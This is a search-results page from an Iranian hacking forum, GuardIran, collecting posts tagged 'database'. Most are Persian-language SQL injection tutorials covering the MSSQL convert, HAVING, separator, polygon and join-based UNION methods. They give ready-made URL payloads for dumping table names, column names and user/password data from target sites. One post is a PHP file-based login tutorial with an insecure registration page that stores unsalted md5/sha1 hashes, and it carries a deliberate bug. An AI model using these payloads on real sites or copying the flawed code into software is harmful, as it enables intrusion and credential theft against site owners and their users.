رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'database'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

  1. MR.MSA

    صفحه ثبت نام و ورود بدون دیتابیس | با PHP

    با سلام خدمت دوستان عزیز امروز میخوایم باهم یک صفحه ورود بدون داشتن دیتابیس بسازیم که در کنارش صفحه ثبت نام هم موجوده و کاربران میتونن ثبت نام کنن. نوشتن صفحه ثبت نام: قدم اول :خب قدم اول توی نوشتن صفحه ثبت ناممون کد های html هست که یک فایل با نام register.php بسازید و کد های زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> در اینجا چهار input داریم که شامل نام کاربری، رمز عبور ، تکرار رمز عبور و ایمیل میشه و در نهایت یک دکمه ثبت نام. قدم دوم : یک فایل با نام users.php بسازید و این کد رو خط اول قرار بدید: <?php die('403'); ?> خب در فایل users.php اطلاعات کاربران اعم از username و password و email قرار میگیره که از تابع die اول کدمون استفاده کردیم که اگر یک نفر این فایل رو توی سایت اجرا کرد خطای 403 بگیره. قدم سوم: حالا برمیگردیم به فایل register.php که کد های php اونو بزنیم یعنی: <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } خط ۲ : از if استفاده کردیم برای بررسی اینکه کاربر دکمه register رو کلیک کرده یا نه خط ۴ : بررسی کردیم که ایا تمام ایپویت ها رو وارد کرده کاربر یا نه خط ۶ : بررسی کردیم که آیا رمز عبود و تکرار رمز عبور دقیقا یکی هست یا نه اگه آره که بریم سراغ اضافه کردن کاربر خط ۱۰ : وارد فایل users.php که قبلا ساختیم میشیم و میشه file handle ما خط ۱۳ : توی متغیر user اطلاعات کاربر رو قرار میدم یعنی نام کاربری ، رمز عبود و ایمیل که نام کاربری و رمز عبود به صورت هش شده و ایمیل به صورت encode قرار میگیره. خط ۱۶ : با تابع fwrite در آخر فایل users.php متغیر user رو اضافه میکنیم. خط ۱۹ : فایل users.php رو میبندیم خط ۲۲ و ۲۳ : نمایش خطا زمانی که تمام اینپوت ها رو کاربر وارد نکرده که میشه else شرطمون (خط ۴) کد نهایی: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } } نوشتن صفحه ورود: قدم اول: یک فایل با نام login.php بسازید و کد های html زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> (اگه دوست داشته باشید میتونید بهش استایل هم بدید ولی برای اینکه آموزش طولانی نشه ما اینکارو نمیکنیم) قدم دوم : کد های php: <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } خب به صورت کلی بخوایم توضیح بدیم که چه اتفاقی افتاده میگیم که اول چک میکنه که ایا username,password ارسال شده یا نه بعد میاد فایل users.php رو باز میکنه با mode خواندن یا read بعد متغیر users رو مساوی با داده های فایل users.php قرار میده حالا میایم دوباره متغیر users رو تعریف میکنیم و با استفاده از تابع explode هر اینتری که توی فایل هست(میشه همون متغیر users) رو توی یک اندیس ارایه قرار میدم. یک متغیر user_id هم تعریف میکنیم چون بعدا ازش میخوایم استفاده کنیم خطای undefined var نده بهمون توی for میایم روی اندیس های آرایه users کار میکنیم و با یک if دونه دونه یوزر ها رو بررسی میکنیم با هش شده ی یوزرنیمی که برامون ارسال شده بعد اگر درست بود یعنی اون اندیس یا همون خط، اطلاعات یوزر ما هست که قرارش میدیم توی user_id و البته از .= که استفاده کردیم به این معنیه : $user_id = $user_id + $users[$i]; که اگر از قبل user_id رو تعریف نمیکردیم خطا میداد و دلیل اینکه از .= استفاده کردیم این بود که قراره توی بخش های بعد ازش استفاده کنیم. خب بعد اومدیم دوباره با یک if بررسی کردیم و با تابع strstr چک کردیم که آیا پسورد (به صورت هش شده) وجود داره توی اون اندیس یا نه در واقع پسورد رو بررسی میکنیم. و اگر درست بود میایم متغیر لاگین رو مساوی با true قرار میدیم که یعنی این شخص لاگینش انجام شده. جلوتر میایم میگیم اگر login شده بود بیا توی این شرط که اول میایم ایمیل رو از اون user خارج میکنیم و میزاریم توی متغیر email که روش های مختلفی میشه این کارو انجام داد ولی من از str_replace استفاده کردم حتی از explode هم میشه استفاده کرد و... در نهایت session رو استارت کردیم و session ها رو ست کردیم که من اومدم name رو مساوی با یوزر نیم و email رو مساوی با ایمیل شخص (با توجه به یوزرنیم و پسوردی که وارد کرده) به صورت دیکد قرار دادم. و هدر کردم به پنل که شما میتونید این قسمتش رو با توجه به کاری که میخواید انجام بدید تغییر بدید. و یک else هم داریم برای زمانی که یوزر و پسورد اشتباه هست ارور بده. کد نهایی پیج لاگین: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } نکته:‌ دوستان عزیز توی پیج ریجستر یک باگ خطرناک داریم که به شکل یک چالش میتونید بهش نگاه کنید، اگر دوستان تمایل داشتید در پایین تاپیک باگ رو ارائه بدید و همچنین نحوه پچ کردنش چون احتملا تا چند روز دیگه ادامه تاپیک نحوه بستن آسیب پذیری و نحوه استفاده از اون رو گداشتیم و یکم ریزه کاری پیج لاگین. موفق و پیروز باشید.
  2. MR.MSA

    آموزش ابزار john

    با سلام خدمت کاربران و مدیران عزیز در این تاپیک برای شما یک ویدئو آماده کردم که ابزار john رو آموزش دادم . دو تا از حالت های پر کاربرد رو آموزش دادم امیدوارم اذت ببرید . از این ابزار می توانید برای گسترش پسورد لیست و کرک هش و ... استفاده کنید . امیدوارم لذت برده باشید و اگه لایک کنید ابزار های بیشتری رو قرار می دم . پیروز و سربلند باشید 😆.
  3. MR.MSA

    Download Keyword

    برای پیدا کردن نوع دیتابیس یک سایت می توانید از افزونه های Wappalyzer و WgatRuns که در سایت هم معرفی شده استفاده کنید . در بعضی تارگت ها نمی توانید از این ها استفاده کنید و آن موقع است که از key word ها استفاده می کنیم و فقط باید یک key word را در کنار ادرس سایت قرار دهیم اگر سایت بدون هیچ مشکلی لود شد یعنی از همان دیتابیس استفاده می کند . مثال : site.com/news.php?id=1(key word) (در فایل KeyWords.txt می توانید key word های هر دیتابیس را مشاهده کنید و از آنها استفاده کنید . ) KeyWords.txt
  4. MR.MSA

    متد Having

    بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
  5. MR.MSA

    sql injection در سایت های asp

    با سلام من قصد دارم در این تاپیک با شما آموزش باگ sql injection در سایت ها asp رو بدم . سطح : متوسط تفاوت mssqli و mysql : Mssql توسط شرکت مایکروسافت درست شده و با قیمت بالایی فروخته می شود و امکانات بیشتری دارد و برای هاست های ویندوز هم هست . Mysql اپن سورس و رایگان است و برای لینوکس است و قابلیت اجرا بر روی ویندوز هم دارد . ------------------------------------------------------------------------------------------------------------------------ تست آسیب پذیری ‌: به ادرس سایت ‘a را اضافه کنید . به این صورت : Site.com/news.aspx?id=4’a و با دریافت خطا یعنی سایت اسیب پذیر است . ------------------------------------------------------------------------------------------------------------------------ بیرون کشیدن اطلاعات اولیه : روش اول : Site.com/news.aspx?id=4+and+1=(convert(int,x)) روش دوم : Site.com/news.aspx?id=4+or+1=(convert(int,x)) و به جای x می توانید این مقادیر بزنید ‌: user db_name @@servername @@version Host_@@version Host_name و.... ------------------------------------------------------------------------------------------------------------------------ برای طولانی نشدن پست ادامه رو در پست های دیگر می گذارم فعلا با مقدمه آشنا بشوید . امیدوارم مورد تایید شما قرار گرفته باشه و پست خوبی رو گذاشته باشم .
  6. MR.MSA

    متد separator در sql injection

    با سلام خدمت دوستان و مدیران عزیز سایت GUARDIRAN در این پست قصد دارم به شما آموزش متد separator رو یدم ، در آموزش متد join اگر یادتون باشه نامی از متد separator رو بردم امروز گفتم شاید مبدتی ها با این متد آشنایی نباشند و آموزشش رو بدم . متد separator‌ : در زمان مرتب سازی تیبل ها ، ستون ها و یوزرنیم و پسورد ها شما میاید از کاما برای گذاشتن تگ br (به صورت hex) استفاده می کنید : ..........(group_concat(table_name,0x3c62723e...... حالا شاید در بعضی تارگت ها سایت به کاما حساس باشد در اینجا است که باید از متد separator استفاده کنید ، به این صورت : .......( group_concat((table_name)separator 0x3c62723e...... زیاد پست رو طولانی نمی کنم و گفتم متد ساده ای هست نیاز به توضیحات ندارد . ممنون که وقت گذاشتید و این تاپیک رو تا آخر خواندید .
  7. MR.MSA

    آموزش متد polygon در sql injection

    با سلام خدمت کاربران و مدیران انجمن گارد ایران من MR.MSA در این پست قصد دارم متد polygon رو به شما آموزش بدهم . ------------------------------------ یکی از کاربرد های متد polygon زمانی است که :‌ در یک تارگت order+by و ... را زدید و تعداد تیبل ها را بدست اوردید و بعد خواستید تیبل ها را بیرون بکشید و با خطای error different number of columns مواجه شدید می توانید از متد polygon استفاده کنید . یکی دیگر از کاربرد های متد polygon زمانی است که :‌ با خطای Unknown column “language’ in ‘field list’ مواجه می شوید می توانید از متد polygon استفاده کنید . ------------------------------------ سطح متد : حرفه ای ------------------------------------ روش استفاده از متد polygon :‌ ابتدا مقدار را پاک کنید : site.com/news.php?id=1 ( نکته : در سایت های که مثلا دو مقدار است آن مقدار را پاک می کنید که اسیب پذیر است و بعد مراحل را پیش می روید . ) -------------- سپس این عبارت را قرار می دهید : [Hidden Content]((select*from(select*from(select@@version)f)x)) و اگر ورژن را به شما نمایش داد یعنی می توانید از متد polygon استفاده کنید . یک جورایی میشه گفت جای که version است ستون آسیب پذیره. -------------- خب حالا می رویم سراغ بیرون کشیدن تیبل ها : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(table_name) from information_schema.tables where table_schema=database())f)x)) قسمت های بنفش قسمت هایی هستند که تازه اضافه شده اند . توجه داشته باشید که به دلایلی دو (( آخر دستور در جاهای دیگر قرار گرفته اند اما در نگاه به این شکل است ولی زمانی که شما این دستور را کپی کنید و به url تارگت اضافه کنید درست نمایش داده می شود . ( در تمامی دستورات به همین شکل است ،‌ پس نگران نباشید 😁) -------------- (برای مثال تیبل مهمی که بدست می آوریم user است ) و حالا برای بیرون کشیدن ستون های یک جدول : site.com/news.php/id=polygon((select*from(select*from(select@@group_concat(column_name)+from+information_schema.columns+where+table_name=’user’)f)x)) قسمت های بنفش قسمت های جدید هستند و باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . -------------- و می مونه بیرون کشیدن اطلاعات ستون های مهم : site.com.news.php/id=polygon((select*from(select*from(select@@group_concat(user,0x3a,pass) from ‘user’)f)x)) باید به جای user نام تیبل مهم خود را بنویسید(در کتیشن ) و به جای user و pass نام ستون مهم خود را بنویسید . اگر با مشکل مواجه شدید دو کتیشن را بردارید و نام تیبل خود را به صورت hex بنویسید . ------------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد polygon یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم . هر گونه سوال در مورد پست داشتید در قسمت سوال و جواب بپرسید .
  8. MR.MSA

    متد join در sql injection

    با سلام خدمت شما کاربران عزیز انجمن گارد ایران در این پست می خواهم متد join رو در باگ sql injection به شما آموزش بدهم . ------------------------ موارد قابل استفاده : ۱- مواجه شدن با خطا زمان استفاده از union select ۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list ۳- زمانی که سایت به عدد حساس است . ۴- و.... ------------------------ نکته :‌ در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از /**/ استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده . ------------------------ نحوه استفاده از متد join :‌ ---------------------------------------- ( برای مثال تعداد تیبل های سایت ۵ تا می باشد. ) مرحله اول بیرون کشیدن ستون آسیب پذیر :‌ +union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+ و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید : from * توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join ---------------------------------------- ( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲ آسیب پذیر است. ) مرحله دوم بدست آوردن ورژن : +union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ---------------------------------------- مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید . ---------------------------------------- ( برای مثال در بین تیبل ها تیبل msa_users وجود دارد . ) مرحله چهارم بیرون کشیدن ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید . ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست . ---------------------------------------- ( برای مثال در خروجی ستون های user و pass مهم است . ) مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید. می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید. و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است ) ---------------------------------------- امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم . هر گونه سوال در مورد پست داشتید بپرسید . ********* MR.MSA ********** Join method in sql injection.txt
  9. R3DN4X314

    بانک اطلاعاتی GTD

    GTD یا همون Global Terrorism Database یک بانک اطلاعاتی جامع در مورد انواع عملیات های تروریستی در پنجاه سال گذشته در تمام جهان هستش که موارد زیادی بینشون موجوده که مربوط به عرصه فعالیت ما میشن ، به همین دلیل استفاده از این دیتابیس ممکنه در جمع اوری اطلاعات در یک سری پروژه های مخصوص به شدت کارامد باشه ، به همین دلیل این بانک اطلاعاتی در چهارچوب های جمع اوری اطلاعات مرتبط با فعالیت های ما ، در سطح جهانی مورد اشاره قرار میگیره این دیتابیس نزدیک به دویست هزار رکورد داره که حاوی وقایع تروریستی جهان با اطلاعات ریز و درشت به صورت جامع از سال 1970 هستش که هم میشه دانلودش کرد و هم میشه انلاین سرچ و مرور کرد (به دلیل اپدیت های لحضه ای) ضمن دسترسی به بانک اطلاعاتی ، توضیحات و موارد جالب زیادی در وبسایت رسمیش موجوده که میتونید از طریق لینک زیر بهش دسترسی پیدا کنید : [Hidden Content]
×
×
  • ایجاد مورد جدید...